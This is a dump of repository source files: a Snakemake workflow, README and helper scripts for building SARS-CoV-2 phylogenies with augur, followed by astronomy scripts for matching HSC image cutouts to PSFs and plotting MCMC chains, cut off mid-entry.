config[\"conda_environment\"]\n shell:\n \"\"\"\n augur translate \\\n --tree {input.tree} \\\n --ancestral-sequences {input.node_data} \\\n --reference-sequence {input.reference} \\\n --output-node-data {output.node_data} 2>&1 | tee {log}\n \"\"\"\n\nrule aa_muts_explicit:\n message: \"Translating amino acid sequences\"\n input:\n tree = rules.refine.output.tree,\n translations = lambda w: rules.align.output.translations\n output:\n node_data = build_dir + \"/{build_name}/aa_muts_explicit.json\",\n translations = expand(build_dir + \"/{{build_name}}/translations/aligned.gene.{gene}_withInternalNodes.fasta\", gene=config.get('genes', ['S']))\n params:\n genes = config.get('genes', 'S')\n log:\n \"logs/aamuts_{build_name}.txt\"\n benchmark:\n \"benchmarks/aamuts_{build_name}.txt\"\n resources:\n # Multiple sequence alignments can use up to 15 times their disk size in\n # memory.\n # Note that Snakemake >5.10.0 supports input.size_mb to avoid converting from bytes to MB.\n mem_mb=lambda wildcards, input: 15 * int(input.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/explicit_translation.py \\\n --tree {input.tree} \\\n --translations {input.translations:q} \\\n --genes {params.genes} \\\n --output {output.node_data} 2>&1 | tee {log}\n \"\"\"\n\nrule traits:\n message:\n \"\"\"\n Inferring ancestral traits for {params.columns!s}\n - increase uncertainty of reconstruction by {params.sampling_bias_correction} to partially account for sampling bias\n \"\"\"\n input:\n tree = rules.refine.output.tree,\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n output:\n node_data = build_dir + \"/{build_name}/traits.json\"\n log:\n \"logs/traits_{build_name}.txt\"\n benchmark:\n \"benchmarks/traits_{build_name}.txt\"\n params:\n columns = config[\"traits\"][\"columns\"],\n sampling_bias_correction = config[\"traits\"][\"sampling_bias_correction\"]\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur traits \\\n --tree {input.tree} \\\n --metadata {input.metadata} \\\n --output {output.node_data} \\\n --columns {params.columns} \\\n --confidence \\\n --sampling-bias-correction {params.sampling_bias_correction} 2>&1 | tee {log}\n \"\"\"\n\nrule clades:\n message: \"Adding internal clade labels\"\n input:\n tree = rules.refine.output.tree,\n aa_muts = rules.translate.output.node_data,\n nuc_muts = rules.ancestral.output.node_data,\n clades = config[\"files\"][\"clades\"]\n output:\n node_data = build_dir + \"/{build_name}/clades.json\"\n log:\n \"logs/clades_{build_name}.txt\"\n benchmark:\n \"benchmarks/clades_{build_name}.txt\"\n resources:\n # Memory use scales primarily with size of the node data.\n mem_mb=lambda wildcards, input: 3 * int(input.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur clades --tree {input.tree} \\\n --mutations {input.nuc_muts} {input.aa_muts} \\\n --clades {input.clades} \\\n --output-node-data {output.node_data} 2>&1 | tee {log}\n \"\"\"\n\nrule tip_frequencies:\n message: \"Estimating censored KDE frequencies for tips\"\n input:\n tree = rules.refine.output.tree,\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n output:\n tip_frequencies_json = build_dir + \"/{build_name}/tip-frequencies.json\"\n log:\n \"logs/tip_frequencies_{build_name}.txt\"\n benchmark:\n \"benchmarks/tip_frequencies_{build_name}.txt\"\n params:\n min_date = config[\"frequencies\"][\"min_date\"],\n max_date = lambda w: datetime.datetime.today().strftime(\"%Y-%m-%d\"),\n pivot_interval = config[\"frequencies\"][\"pivot_interval\"],\n pivot_interval_units = config[\"frequencies\"][\"pivot_interval_units\"],\n narrow_bandwidth = config[\"frequencies\"][\"narrow_bandwidth\"],\n proportion_wide = config[\"frequencies\"][\"proportion_wide\"]\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur frequencies \\\n --method kde \\\n --metadata {input.metadata} \\\n --tree {input.tree} \\\n --min-date {params.min_date} \\\n --max-date {params.max_date} \\\n --pivot-interval {params.pivot_interval} \\\n --pivot-interval-units {params.pivot_interval_units} \\\n --narrow-bandwidth {params.narrow_bandwidth} \\\n --proportion-wide {params.proportion_wide} \\\n --output {output.tip_frequencies_json} 2>&1 | tee {log}\n \"\"\"\n\nif 'distances' in config:\n rule distances:\n input:\n tree = rules.refine.output.tree,\n alignments = build_dir + \"/{build_name}/translations/aligned.gene.S_withInternalNodes.fasta\",\n distance_maps = config['distances']['maps']\n params:\n genes = 'S',\n comparisons = config['distances']['comparisons'],\n attribute_names = config['distances']['attributes']\n output:\n node_data = build_dir + \"/{build_name}/distances.json\"\n conda:\n config[\"conda_environment\"]\n shell:\n \"\"\"\n augur distance \\\n --tree {input.tree} \\\n --alignment {input.alignments} \\\n --gene-names {params.genes} \\\n --compare-to {params.comparisons} \\\n --attribute-name {params.attribute_names} \\\n --map {input.distance_maps} \\\n --output {output}\n \"\"\"\n\nrule colors:\n message: \"Constructing colors file\"\n input:\n ordering = config[\"files\"][\"ordering\"],\n color_schemes = config[\"files\"][\"color_schemes\"],\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n output:\n colors = build_dir + \"/{build_name}/colors.tsv\"\n log:\n \"logs/colors_{build_name}.txt\"\n benchmark:\n \"benchmarks/colors_{build_name}.txt\"\n resources:\n # Memory use scales primarily with the size of the metadata file.\n # Compared to other rules, this rule loads metadata as a pandas\n # DataFrame instead of a dictionary, so it uses much less memory.\n mem_mb=lambda wildcards, input: 5 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/assign-colors.py \\\n --ordering {input.ordering} \\\n --color-schemes {input.color_schemes} \\\n --output {output.colors} \\\n --metadata {input.metadata} 2>&1 | tee {log}\n \"\"\"\n\n\ndef _get_node_data_by_wildcards(wildcards):\n \"\"\"Return a list of node data files to include for a given build's wildcards.\n \"\"\"\n # Define inputs shared by all builds.\n wildcards_dict = dict(wildcards)\n inputs = [\n rules.refine.output.node_data,\n rules.ancestral.output.node_data,\n rules.translate.output.node_data,\n rules.clades.output.node_data,\n rules.traits.output.node_data,\n rules.aa_muts_explicit.output.node_data\n ]\n if \"distances\" in config: inputs.append(rules.distances.output.node_data)\n\n # Convert input files from wildcard strings to real file names.\n inputs = [input_file.format(**wildcards_dict) for input_file in inputs]\n return inputs\n\nrule export:\n message: \"Exporting data files for auspice\"\n input:\n tree = rules.refine.output.tree,\n metadata = build_dir + \"/{build_name}/metadata.tsv\",\n node_data = _get_node_data_by_wildcards,\n auspice_config = lambda w: config[\"builds\"][w.build_name][\"auspice_config\"] if \"auspice_config\" in config[\"builds\"][w.build_name] \\\n else config[\"files\"][\"auspice_config\"],\n colors = lambda w: config[\"builds\"][w.build_name][\"colors\"] if \"colors\" in config[\"builds\"][w.build_name]\\\n else ( config[\"files\"][\"colors\"] if \"colors\" in config[\"files\"]\\\n else rules.colors.output.colors.format(**w) ),\n lat_longs = config[\"files\"][\"lat_longs\"],\n description = lambda w: config[\"builds\"][w.build_name][\"description\"] if \"description\" in config[\"builds\"][w.build_name]\n else config[\"files\"][\"description\"],\n tip_freq_json = rules.tip_frequencies.output.tip_frequencies_json\n output:\n auspice_json = auspice_dir + f\"/{auspice_prefix}_{{build_name}}.json\",\n root_sequence_json = auspice_dir + f\"/{auspice_prefix}_{{build_name}}_root-sequence.json\",\n tip_freq_json = auspice_dir + f\"/{auspice_prefix}_{{build_name}}_tip-frequencies.json\"\n log:\n \"logs/export_{build_name}.txt\"\n benchmark:\n \"benchmarks/export_{build_name}.txt\"\n params:\n title = lambda w: config[\"builds\"][w.build_name].get(\"title\", \"SARS-CoV-2 phylogeny\")\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur export v2 \\\n --tree {input.tree} \\\n --metadata {input.metadata} \\\n --node-data {input.node_data} \\\n --auspice-config {input.auspice_config} \\\n --include-root-sequence \\\n --colors {input.colors} \\\n --lat-longs {input.lat_longs} \\\n --title {params.title:q} \\\n --description {input.description} \\\n --output {output.auspice_json} 2>&1 | tee {log};\n cp {input.tip_freq_json} {output.tip_freq_json}\n \"\"\"\n" }, { "alpha_fraction": 0.8160919547080994, "alphanum_fraction": 0.8247126340866089, "avg_line_length": 115, "blob_id": "2d66edd0217f9979ad12fd962e8e64195b302b20", "content_id": "887ad3492986c32632f7b583d33b852ba599a8ed", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 348, "license_type": "permissive", "max_line_length": 178, "num_lines": 3, "path": "/profiles/genbank/description.md", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "This phylogeny shows evolutionary relationships of SARS-CoV-2 viruses from the ongoing novel coronavirus COVID-19 pandemic using open data shared by researchers across the world.\nThe data that went into this analysis and the intermediate steps are available on nextstrain.org.\n * data.nextstrain.org/files/ncov/open/<data_set_name>_alignment.fasta\n" }, { "alpha_fraction": 0.7207520604133606, "alphanum_fraction": 0.7261490225791931, "avg_line_length": 48.07692337036133, "blob_id": "9b856e17486e88e2e4dba8d601a42316f60c4a08", "content_id": "b3e6aa38086c4bcf6c9badbb160c63c713ed31de", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5758, "license_type": "permissive", "max_line_length": 241, "num_lines": 117, "path": "/README.md", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "🚨⚠️ Go to [**neherlab/ncov-simple**](https://github.com/neherlab/ncov-simple/) for an actively maintained version of this workflow. You're currently viewing `nextstrain/ncov-simple` which is many commits behind the `neherlab` fork. ⚠️🚨\n\n*This repository currently serves as a sandbox to explore how our main [ncov workflow](github.com/nextstrain/ncov) could restructured and simplified. Feel free to use it, but don't expect continuity or extensive documentation at this point.*\n\n## Simplified nextstrain/ncov (SARS-CoV-2) workflow using reference data sets\n\nThe reference data sets are assembled from SARS-CoV-2 available in the public domain.\nThe availability of open data varies greatly be region and the only regions for which we have good coverage at the moment are the United States and Oceania.\n\n### Set up\n\n```\ngit clone https://github.com/nextstrain/ncov-simple.git\n./decompress_example.sh\n```\nThe second step is only necessary if you want to run the example profile.\nThe standard nextstrain conda environment should be sufficient to run this workflow.\nIt can then be run as\n```\nsnakemake --profile example_profile\n```\n\n### make your own build\nCopy the `example_profile` folder and its content and modify the file `builds.yaml`.\nThe example profile contains builds that are specified like this example for an extra small build using a reference set for Washington, US:\n```\nbuilds:\n us-washington:\n reference_metadata: \"https://data.nextstrain.org/ncov-reference-datasets/US-WA-xsmall_metadata.tsv.xz\"\n reference_sequences: \"https://data.nextstrain.org/ncov-reference-datasets/US-WA-xsmall_sequences.fasta.xz\"\n user_metadata: \"example_data/metadata.tsv\"\n user_sequences: \"example_data/sequences.fasta\"\n```\nYou want to change the entries `user_metadata` and `user_sequences` to point at your data and choose and appropriate reference data set.\nThese entries can be a list of multiple files.\n\n\n### Available reference data sets\n\nCurrently, we provide reference datasets representing all available data, the standard Nextstrain regions, and the US states.\nEach data set comes in three sizes -- one standard size with 4k sequences, a small one with 2k sequences, and an extra small one with 1k sequences.\nThe sequences are a random sample from the focal region (emphasis on the last 4 months) and augmented by sequences from outside the focal regions using Nextstrain's proximity guided sampling.\n\nThe data are available at `data.nextstrain.org/ncov-reference-datasets` and follow the URL patter\n\n```\nhttps://data.nextstrain.org/ncov-reference-datasets/<region>-<size>_metadata.tsv.xz\"\nhttps://data.nextstrain.org/ncov-reference-datasets/<region>-<size>_sequences.fasta.xz\"\n```\nwhere `region` can be `global`, `africa`, `asia`, `europe`, `north-america`, `oceania`, `south-america` or a US state using two letter state abbreviations as in `US-CA`, `US-NJ`, etc.\n\n\n## Templated builds\n\nIn some situation, you want to run builds for many different data subsamples, for example for different countries, states, variants etc.\nTo facilitate such builds, this repo contains a functionality to __template__ builds.\nThis is used in the profiles `profiles/basel-swiss`, `profiles/basel-countries`, and `profiles/genbank` and work as follows:\n\n * you specify lists of features for which you want to make builds. For example regions, countries, build sizes\n * you specify a number of parameters for the builds, these are expressions that will be evaluated\n * you specify metadata adjustments, which are pandas queries\n * you specify subsampling schemes.\n\nThe builds spec would then look like this:\n```\ntemplated-builds:\n regions:\n build_patterns:\n region:\n north-america: \"North America\"\n asia: \"Asia\"\n africa: \"Africa\"\n europe: \"Europe\"\n south-america: \"South America\"\n oceania: \"Oceania\"\n size:\n 4k: 4000\n 2k: 2000\n 1k: 1000\n build_name: \"{region}_{size}\"\n ...\n```\nThis defines a templated build `regions` that will generate builds of three different sizes for each region.\nThe subsampling parameters are defined as\n```\n subsampling_parameters:\n date_cutoff: \"(datetime.date.today() - datetime.timedelta(weeks=18)).strftime('%Y-%m-%d')\"\n s_global_early: \"int(0.1*{size})\"\n s_global_late: \"int(0.2*{size})\"\n s_region_early: \"int(0.3*{size})\"\n s_region_late: \"int(0.4*{size})\"\n subsamples:\n global_early:\n filters: \"--exclude-where region='{region}' --group-by country year month --subsample-max-sequences {s_global_early} --max-date {date_cutoff}\"\n region_early:\n filters: \"--exclude-where region!='{region}' --group-by country year month --subsample-max-sequences {s_region_early} --max-date {date_cutoff}\"\n global_late:\n filters: \"--exclude-where region='{region}' --group-by country year month --subsample-max-sequences {s_global_late} --min-date {date_cutoff}\"\n priorities: \"region_late\"\n region_late:\n filters: \"--exclude-where region!='{region}' --group-by country year month --subsample-max-sequences {s_region_late} --min-date {date_cutoff}\"\n```\nEach in each expression, the variables are substituted before the command is launched.\nMetadata adjustments (for example to replace all divisions outside a focal region with a higher order geographic designation) can be implemented as\n```\n metadata_adjustments:\n - query: region!='{region}'\n dst: country\n src: region\n - query: region!='{region}'\n dst: division\n src: region\n - query: region!='{region}'\n dst: location\n src: region\n```\nAgain, the build parameters and subsampling parameters will be substituted before the expressions are evaluated.\n\n\n" }, { "alpha_fraction": 0.7340425252914429, "alphanum_fraction": 0.7340425252914429, "avg_line_length": 30, "blob_id": "00615485a3d5abe2852eb6524d49d968b65abf4b", "content_id": "b892e9f2af088de0df07be37ac5aedaea78512a7", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 94, "license_type": "permissive", "max_line_length": 71, "num_lines": 3, "path": "/decompress_example.sh", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nxz -d -c example_data/sequences.fasta.xz > example_data/sequences.fasta \n" }, { "alpha_fraction": 0.6474575996398926, "alphanum_fraction": 0.6474575996398926, "avg_line_length": 29.102041244506836, "blob_id": "136a1c5b10ee9ce09041e1028b6bf32114cc56d2", "content_id": "36a70006e83dee36fa541c878efd49b87e046f75", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1475, "license_type": "permissive", "max_line_length": 114, "num_lines": 49, "path": "/Snakefile", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "import datetime\n\nif \"builds\" not in config:\n config[\"builds\"] = {}\nif \"files\" not in config:\n configfile: \"defaults/parameters.yaml\"\n\nif \"origins\" in config:\n include: \"workflow/snakemake_rules/preprocess.smk\"\n\nif \"reference-builds\" in config:\n config[\"builds\"].update(config[\"reference-builds\"])\n # Include rules to handle primary build logic from multiple sequence alignment\n # to output of auspice JSONs for a default build.\n include: \"workflow/snakemake_rules/reference_build.smk\"\n\n\nif \"templated-builds\" in config:\n include: \"workflow/snakemake_rules/templated_build.smk\"\n\nif len(config[\"builds\"]):\n include: \"workflow/snakemake_rules/subsampling.smk\"\n include: \"workflow/snakemake_rules/core.smk\"\n\nauspice_prefix = config.get(\"auspice_prefix\", \"ncov\")\nrule all:\n input:\n lambda w: [auspice_dir + f\"/{auspice_prefix}_{build}.json\" for build in config[\"builds\"]] +\\\n [auspice_dir + f\"/{auspice_prefix}_{build}_root-sequence.json\" for build in config[\"builds\"]] +\\\n [auspice_dir + f\"/{auspice_prefix}_{build}_tip-frequencies.json\" for build in config[\"builds\"]]\n\nrule clean_all:\n message: \"Removing directories: {params}\"\n params:\n \"builds\",\n \"auspice\",\n \"pre-processed\",\n \"data\"\n shell:\n \"rm -rfv {params}\"\n\n\nrule clean:\n message: \"Removing directories: {params}\"\n params:\n \"builds\",\n \"auspice\"\n shell:\n \"rm -rfv {params}\"\n" } ]
9
eduardrusu/zMstarPDF
https://github.com/eduardrusu/zMstarPDF
4393a9085e0c72a3d91c154b975af94ee9c69214
0ebc596666505a624cd947ad00c5b971f89b9bcd
b473cd3def86bb2a79a36d7b9639e6e36507266a
refs/heads/master
2020-12-24T13:21:25.488825
2020-10-27T06:39:00
2020-10-27T06:39:00
31,794,803
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6651480793952942, "alphanum_fraction": 0.7608200311660767, "avg_line_length": 23.38888931274414, "blob_id": "6a0ed22ec75eee15e85ffad22e0def7b4843e558", "content_id": "e05eb640edeba65c23705531bf04ad27320e22ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 439, "license_type": "no_license", "max_line_length": 98, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer17.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log17.out\n#PBS -e Log17.err\n#PBS -N 17\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal gamma oneoverr tidal\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal gamma oneoverr tidal\n" }, { "alpha_fraction": 0.6069254279136658, "alphanum_fraction": 0.6194825172424316, "avg_line_length": 38.223880767822266, "blob_id": "c8c4a8fb1a51dc3a303a5919df800e46fcd11f1b", "content_id": "3dc0de0afc8903cebf119f7d4145941f542ed36e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2628, "license_type": "no_license", "max_line_length": 122, "num_lines": 67, "path": "/python/image_utilities/HSCmatchcutoutpsf.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given folders containing image cutouts and corresponding PSFs, match them by accounting for duplicates and missing files\n# run as python HSCmatchcutoutpsf.py\n\n#from astropy.io import fits\nimport numpy as np\nimport os\nimport glob\nfrom astropy.wcs import WCS\nfrom astropy.io import fits\n\npath = \"/Volumes/LaCieSubaru/Gaia/James/\"\nos.chdir(path)\nfolder_cutout = glob.glob('arch*')\nfolder_psf = glob.glob('psf-*')\n\nlist_cutout = np.array([])\nfor i in range(len(folder_cutout)):\n files = glob.glob('%s/*' % folder_cutout[i])\n files_array = np.asarray(files)\n list_cutout = np.r_[list_cutout,files_array]\n\nlist_psf = np.array([])\nfor i in range(len(folder_psf)):\n files = glob.glob('%s/*' % folder_psf[i])\n files_array = np.asarray(files)\n list_psf = np.r_[list_psf,files_array]\n\nlist_psf_filter = np.empty(len(list_psf),dtype=\"string\")\nlist_psf_ra = np.zeros(len(list_psf))\nlist_psf_dec = np.zeros(len(list_psf))\nfor i in range(len(list_psf)):\n str = list_psf[i].split(\"-\")\n ra = float(str[10])\n if str[-2] == '': str[-1] = '-' + str[-1]\n dec = float(str[-1][:-5])\n filter = str[7]\n list_psf_filter[i] = filter\n list_psf_ra[i] = ra\n list_psf_dec[i] = dec\n\nlist_cutout_filter = np.empty(len(list_cutout),dtype=\"string\")\nlist_cutout_ra = np.zeros(len(list_cutout))\nlist_cutout_dec = np.zeros(len(list_cutout))\nfor i in range(len(list_cutout)):\n if i % 1000 == 0: print i\n file = fits.open(list_cutout[i])\n w = WCS(file[1].header)\n coord = w.wcs_pix2world(21,21,1)\n list_cutout_ra[i] = coord[0]\n list_cutout_dec[i] = coord[1]\n file.close()\n str = list_cutout[i].split(\"-\")\n filter = str[5]\n list_cutout_filter[i] = filter\n\nout_cutout = np.c_[list_cutout,list_cutout_filter,list_cutout_ra,list_cutout_dec]\nout_psf = np.c_[list_psf,list_psf_filter,list_psf_ra,list_psf_dec]\nnp.savetxt(\"cutouts_g.cat\",out_cutout[out_cutout[:,1]=='G'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"cutouts_r.cat\",out_cutout[out_cutout[:,1]=='R'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"cutouts_i.cat\",out_cutout[out_cutout[:,1]=='I'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"cutouts_z.cat\",out_cutout[out_cutout[:,1]=='Z'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"cutouts_y.cat\",out_cutout[out_cutout[:,1]=='Y'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_g.cat\",out_psf[out_psf[:,1]=='G'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_r.cat\",out_psf[out_psf[:,1]=='R'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_i.cat\",out_psf[out_psf[:,1]=='I'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_z.cat\",out_psf[out_psf[:,1]=='Z'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_y.cat\",out_psf[out_psf[:,1]=='Y'],'%s \\t %s \\t %s \\t %s')\n" }, { "alpha_fraction": 0.7431014180183411, "alphanum_fraction": 0.7811892628669739, "avg_line_length": 106.20833587646484, "blob_id": "dcd847e65f06ab30c6c90b28eb272a3bd2f7ea6d", "content_id": "ab08e26af0b0e9ce3cde4d404682749d8c97d52d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2575, "license_type": "no_license", "max_line_length": 632, "num_lines": 24, "path": "/README.md", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# zMstarPDF\n\nCalculating joint photo-z and Mstar PDFs, while coping with various systematics.\n\nMotivated primarily by understanding massive structures along the lines of sight to time delay strong gravitational lenses so that we can attempt to make accurate time delay distance measurements, we are trying to infer photometric redshifts simultaneously (or at least self-consistently) with stellar masses, from optical and near infrared survey photometry.\n\nOur main test data are the 5 H0LiCOW lens fields, observed in _ugriJHK_ as well as 4 _IRAC_ bands. We use a weighted counts approach to translate measured over/under-densities in these fields, with respect to a large calibration survey, into a probability distribution for the external convergence (see [_Rusu et al, 2017_] (http://adsabs.harvard.edu/abs/2016arXiv160701047R) for details). Our calibration data of choice are the CFHTLenS object catalogs, generated with `SExtractor`, with photo-zs and stellar mass esstimates from `BPZ` and `LePhare`, respectively. We have two options for inferring z and Mstar from these datasets:\n\n* Follow the same procedure as the CFHTLenS team, so that we can simply re-use their data products. This is the approach we used in [_Rusu et al, 2017_] (http://adsabs.harvard.edu/abs/2016arXiv160701047R).\n* Infer z and Mstar from the CFHTLS and H0LiCOW photometry afresh, generating MCMC samples from Pr(z,Mstar|data) directly. This is possible using the `stellarpops` code (Auger et al 2010).\n\nThis repository contains scripts and notes, as well as code used in our investigations of these options. In particular, it contains the complete code used for the analysis presented in [_Rusu et al, 2017_] (http://adsabs.harvard.edu/abs/2016arXiv160701047R). **The porting of the code is not yet complete.** A summary of our results is available on this [webpage] (http://shsuyu.github.io/H0LiCOW/site/paperIII.html).\n\nAt present, we have completed our investigation of the first H0LiCOW lens, HE0435−1223, and we are focusing on the second lens, WFI2033-4723.\n\n### People\n\n* Cristian Eduard Rusu (UC Davis)\n* Chris Fassnacht (UC Davis)\n* Phil Marshall (KIPAC)\n\n### Contacts, License etc.\n\nThis is astronomy research in progress: while the contents of this repository are publically visible, they are Copyright 2015 the authors, and not available for re-use. Please cite _([Rusu et al, 2017] (http://adsabs.harvard.edu/abs/2016arXiv160701047R))_, _(Rusu et al, in preparation)_ if you need to refer to this work, and feel free to get in touch via [this repo's issues](https://github.com/eduardrusu/zMstarPDF/issues).\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "70fb7371ce4449eb6adf3f225018e3661e7c73a9", "content_id": "40461be19dcbef8d96bd6c5914ea1cb864e14a82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch4_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb4.out\n#PBS -e Logb4.err\n#PBS -N 4\n#PBS -l mem=11gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.5529801249504089, "alphanum_fraction": 0.5684326887130737, "avg_line_length": 32.18867874145508, "blob_id": "fd50d1d36817559c1b4c52d8d5922d749c9095af", "content_id": "e60242fab7a8bbe590edf8d8c7d56454924b3751", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1812, "license_type": "no_license", "max_line_length": 124, "num_lines": 53, "path": "/python/modeling_utilities/mcmc_multipleprogression.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a list of MCMC chains, plot them all to assess burn-in and convergence\r\n# run as python mcmc_multipleprogression.py file1 [file2] [...]\r\n\r\nimport sys\r\nimport numpy as np\r\nimport pylab as plt\r\n\r\nchains = len(sys.argv) - 1\r\nprint \"Using %s chains...\" % chains\r\nfiles = sys.argv\r\n\r\nplt.clf()\r\nfor j in range(chains):\r\n x=np.loadtxt(sys.argv[j + 1],unpack=True)\r\n ndim = np.shape(x)[0] - 1\r\n if j == 0: fig, axes = plt.subplots(ndim, 1, sharex=True, figsize=(5, 1*10*ndim))\r\n x = x[1:]\r\n for i in range(ndim):\r\n axes[i].plot(x[i],linewidth=0.1,alpha=0.8)\r\n if i ==0: axes[i].set_ylabel(\"%s\" %i)\r\naxes[i].set_xlabel(\"step number\")\r\nfig.tight_layout(h_pad=0.0)\r\n\r\n# program to find the stem of given list of words function to find the stem (longest common substring) from the string array\r\n# This code is contributed by ita_c (https://www.geeksforgeeks.org/longest-common-substring-array-strings/)\r\ndef findstem(arr):\r\n # Determine size of the array\r\n n = len(arr)\r\n # Take first word from array\r\n # as reference\r\n s = arr[0]\r\n l = len(s)\r\n res = \"\"\r\n for i in range( l) :\r\n for j in range( i + 1, l + 1) :\r\n # generating all possible substrings\r\n # of our reference string arr[0] i.e s\r\n stem = s[i:j]\r\n k = 1\r\n for k in range(1, n):\r\n # Check if the generated stem is\r\n # common to all words\r\n if stem not in arr[k]:\r\n break\r\n # If current substring is present in\r\n # all strings and its length is greater\r\n # than current result\r\n if (k + 1 == n and len(res) < len(stem)):\r\n res = stem\r\n return res\r\n\r\nstems = findstem(files[1:])\r\nfig.savefig(\"%stimeline.png\" % stems)\r\n" }, { "alpha_fraction": 0.718120813369751, "alphanum_fraction": 0.7583892345428467, "avg_line_length": 34.05882263183594, "blob_id": "87fa641d5012d25d21e7a6d2fa6d1df4477fdf2f", "content_id": 